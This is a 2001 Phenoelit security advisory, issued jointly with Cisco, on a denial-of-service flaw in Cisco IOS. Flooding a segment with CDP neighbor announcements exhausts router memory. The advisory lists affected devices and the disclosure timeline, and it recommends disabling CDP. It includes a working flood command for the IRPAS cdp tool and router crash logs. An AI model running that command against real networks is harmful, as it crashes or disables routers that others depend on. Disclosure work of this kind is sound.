Phenoelit Advisory [ Authors ] FX FtR kim0 smoovB Phenoelit Group (http://www.phenoelit.de) [ Affected Products ] Cisco IOS - several versions Known vulnerable combinations: Cisco 1005 IOS 11.1.* Cisco 1603 IOS 11.2, 11.3.11b Cisco 2503 IOS 12.0.19 Cisco 2600 IOS 12.1.? Catalyst 2940XL IOS 12.0(5.1)XP Known to be not vulnerable: Catalyst 5505 CatOS 4.5(1) Cisco Bug ID: CSCdu09909 [ Vendor communication ] 04/25/2001 Cisco contacted via psirt@cisco.com 04/25/2001 Damir Rajnovic (gaus@cisco.com) reply 04/26/2001 Gaus confirmed vulnerability, fix planed 05/16/2001 Gaus had no feedback from the developers 06/12/2001 Gaus still left in the cold by his developer contacts 06/29/2001 Gaus reports that work on the issue has started but release date is unknown. 07/03/2001 Cisco expects fix between September and October for the major IOS releases 09/27/2001 This advisory goes to Cisco for coordination 10/02/2001 Final coordination response from Gaus 10/09/2001 Joint release with Cisco Systems (Gaus) Phenoelit wants to thank gaus@cisco.com (Damir Rajnovic) for the outstanding communication and cooperation. [ Overview ] Cisco Systems IOS is vulnerable to a denial-of-service attack using Cisco's proprietary Cisco Discovery Protocol (CDP). When flooded with CDP neighbor announcements, the IOS uses up all it's memory to store the neighbor information. The device is then unable to perform operations that need additional memory such as receiving routing updates and accepting inbound telnet(1) connections. Some device/IOS combinations tested reboot, others simply stop working completely. [ Decription ] The Cisco Discovery Protocol is a layer two protocol and therefore independent from layer three protocols configured on the device. A Cisco device sends out periodic updates out of it's interfaces to make itself known to it's neigbors. Since it is a layer two protocol, these packets (frames) are not routed. The updates are send on Ethernet to the multicast address 01:00:0C:CC:CC:CC. If a Cisco device receives a CDP frame from another device, it copies the contents into internal data structures that can be viewed by the operator using the 'show cdp neighbors' command. The information includes the Device ID, capabilities, platform and sender's port ID. The CDP frames also include a hold timer value to tell the neighbor when he has to discard the information. The maximum values for this timer is 255 seconds (4 minutes, 15 seconds). The internal data structure seems to use the remote device ID as key. When receiving two identical but long device IDs, some IOS versions are unable to identify them as identical and stores both of them as independent records. When flooding a network segment with large CDP frames containing a random device ID and comming from a random data link address, different IOS versions react differently. The range of possible reactions includes: + Reboot after 3 to 5 frames are received + Completely stop working after some thousands of frames + Use all available memory to store CDP neighbor information until the hold timer expires While the memory of the device is completely filled with CDP information, it is unable to perform other operations that need additional memory allocated. This includes accepting dynamic routing updates or new inbound telnet(1) sessions. If an operator on the device console tries to debug the CDP traffic using the command 'debug cdp packets', all tested devices crashed. Interesting is the reaction of the command line 'shell' when flooding the device as seen in the example. At least the help doesn't work anymore. It is not known if this behavior can be used for further exploitation of the device. [ Example ] To send CDP messages, the cdp sender tool from the Phenoelit IRPAS package is used (http://www.phenoelit.de/irpas/). The command line to send maximum sized cdp frames with random data link addresses and device names is: linuxbox# ./cdp -i eth0 -m0 -n 100000 -l 1480 -r -v Be careful when running this! All vulnerable Cisco devices in the data link multicast domain will be affected (read: all Ciscos connected to your Ethernet hub/switch). Reaction of a Cisco 1603 / IOS 11.2(4): radio# %SYS-2-MALLOCFAIL: Memory allocation of 1480 bytes failed from 0x81B3BE6, pool Processor, alignment 0 -Process= "CDP Protocol", ipl= 0, pid= 9 -Traceback= 80ABDCC 80ACF46 81B3BEE 81B3B72 81B276A 81B224C radio# %SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from 0x81B26D2, pool Processor, alignment 0 -Process= "CDP Protocol", ipl= 0, pid= 9 -Traceback= 80ABDCC 80ACF46 81B26DA 81B224C %SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from 0x81B26D2, pool Processor, alignment 0 -Process= "CDP Protocol", ipl= 0, pid= 9 -Traceback= 80ABDCC 80ACF46 81B26DA 81B224C radio#sh ? % Unrecognized command radio#show ? % Unrecognized command radio# Reaction after 'debug cdp packets': %Log packet overrun, potential memory corruption, PC 0x81B2720, format: %s %Log packet overrun, potential memory corruption, PC 0x81B2720, format: %s ....[lots of these]..... %Log packet overrun, potential memory corruption, PC 0x81B2720, format: %s %Log packet overrun, potential memory corruption, PC 0x81B2720, format: %s *** BUS ERROR *** access address = 0x5f227998 program counter = 0x80ad45a status register = 0x2700 vbr at time of exception = 0x4000000 special status word = 0x0045 faulted cycle was a longword read monitor: command "boot" aborted due to exception System Bootstrap, Version ..... Copyright (c) 1994-1996 by cisco Systems, Inc. C1600 processor with 2048 Kbytes of main memory program load complete, entry point: 0x4018060, size: 0x1da950 [ Solution ] Include the command 'no cdp run' in all configurations of Cisco devices and update your IOS to a fixed version when these become available. [ end of file ]